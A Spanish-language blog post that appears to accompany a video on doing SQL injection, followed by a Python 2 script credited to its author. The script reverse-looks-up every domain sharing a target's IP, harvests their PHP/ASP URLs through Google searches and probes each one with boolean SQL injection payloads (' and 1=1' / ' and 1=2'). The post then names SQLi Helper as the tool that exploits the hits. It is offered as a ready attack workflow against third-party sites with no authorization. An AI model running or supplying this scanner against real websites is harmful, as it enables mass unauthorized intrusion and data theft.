Hola buen día, en este video muestro la manera de usar SQL injection de manera muy sencilla, en este caso uso dos herramientas para ello uno es un script que te muestra los enlaces vulnerables para SQLi escrito por Abrahametalero y la otra es SQLi Helper esta es quien los explota. SQLi Helper lo uso en una maquina virtual con windows si alguien ya lo pudo hacer funcionar con wine espero me comparta como.
[youtube iNufMWprFXs]
SCRIPT
import sys import socket import urllib, urllib2 import re from urlparse import urlparse try: import simplejson as json except ImportError: import json class SQLF(): def __init__(self): self.Host = sys.argv[1] self.IP = "" self.URLS = [] self.URLS_Vulnerables = [] if ("http://" in self.Host): #Nos da error si no quitamos http:// self.Host = self.Host.replace('http://','') if ("/" in self.Host): #Igual nos da error si no lo quitamos self.Host = self.Host.replace("/","") self.IP = socket.gethostbyname(self.Host) #Sacamos el ip del host print "\nHost: %s" % self.Host print "IP: %s" % self.IP Dominios = self.ReverseDNS() for Dominio in Dominios: print "[+] Checando %s" % Dominio Resultado = True Restricciones="" y = 0 Query = "site:" + Dominio + "+inurl:php%7Casp%20" + Restricciones # La consulta codificada Buscar = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=large&start=" % Query while (Resultado): Source = urllib2.urlopen(Buscar+str(y)) #Hacemos la consulta Decode = json.loads(Source.read()) Source.close() # y cerramos if (Decode["responseData"] != None and Decode["responseData"]["results"] != []): for URL in Decode["responseData"]["results"]: self.URLS.append(URL["unescapedUrl"]) y = y + 10 else: Resultado = False print "[+] Obtenidas %i URLs" % len(self.URLS) if (len(self.URLS) == 0): print "[-] Maldito Google ya no quiere responder nuestras solicitudes :(" self.tieneQuery() self.BorrarDuplicados() self.esVulnerable() if (len(self.URLS_Vulnerables) > 0): print "\n####################### URLs Posiblemente vulnerables #######################" for URL_vuln in self.URLS_Vulnerables: print "[+] %s" % URL_vuln print "#############################################################################" else: print "\n[-] No se ha encontrado ningun URL vulnerable..." print "------------ [EOF] ------------" def ReverseDNS(self, x=0): Dominios=[] URL=["http://api.search.live.net/json.aspx?AppId=7066FAEB6435DB963AE3CD4AC79CBED8B962779C&Query=IP:IPAQUI&Sources=web&Web.Offset=OFFSET1", "http://www.ip-adress.com/reverse_ip/"] UserAgent = "Mozilla/5.0 (compatible; Konqueror/3.5.8; Linux)" Header = {"User-Agent": UserAgent} if (x == 0): Request = urllib2.Request(URL[1]+self.Host, headers=Header) Source = urllib2.urlopen(Request).read() Founds = re.findall("href=\"/whois/\S+\">Whois]",Source) print "\nSitios encontrados en el mismo DNS: %i \n" % len(Founds) if len(Founds) >=1: for Found in Founds: Found = Found.replace("href=\"/whois/","") Found = Found.replace("\">Whois]","") print "[+] %s" % Found Dominios.append(Found) return Dominios else: print "\nNo se encontro algun resultado positivo\n" else: pass def BorrarDuplicados(self): URL_url = [] URL_query = [] URL_fake = [] for URL in self.URLS: URL_url.append(urlparse(URL).netloc + urlparse(URL).path) URL_query.append(urlparse(URL).query) self.URLS = [] for i in range(0, len(URL_url)): if (URL_url[i] not in URL_fake): URL_fake.append(URL_url[i]) self.URLS.append("http://" + URL_url[i] + "?" + URL_query[i]) def esVulnerable(self): print for URL in self.URLS: print "[+] Checando si %s es vulnerable..." % URL web_Original = urllib.urlopen(URL).read() web_Bien = urllib.urlopen(URL + " and 1=1").read() web_Fail = urllib.urlopen(URL + " and 1=2").read() if (web_Original == web_Bien and web_Bien != web_Fail): print " [>]Web Vulnerable: %s" % URL self.URLS_Vulnerables.append(URL) def tieneQuery(self): tmp_URLS = self.URLS self.URLS = [] for URL in tmp_URLS: URL_Query = urlparse(URL).query if (URL_Query != ""): self.URLS.append(URL) if __name__ == '__main__': if (len(sys.argv) > 1): SQLF_ = SQLF() else: print "--------------------------------------------------------------" print "---- SQLi Finder by Abrahametalero ----" print "---- USO: %s [Target] ----" % sys.argv[0] print "---------------------------------------------------------[EOF]"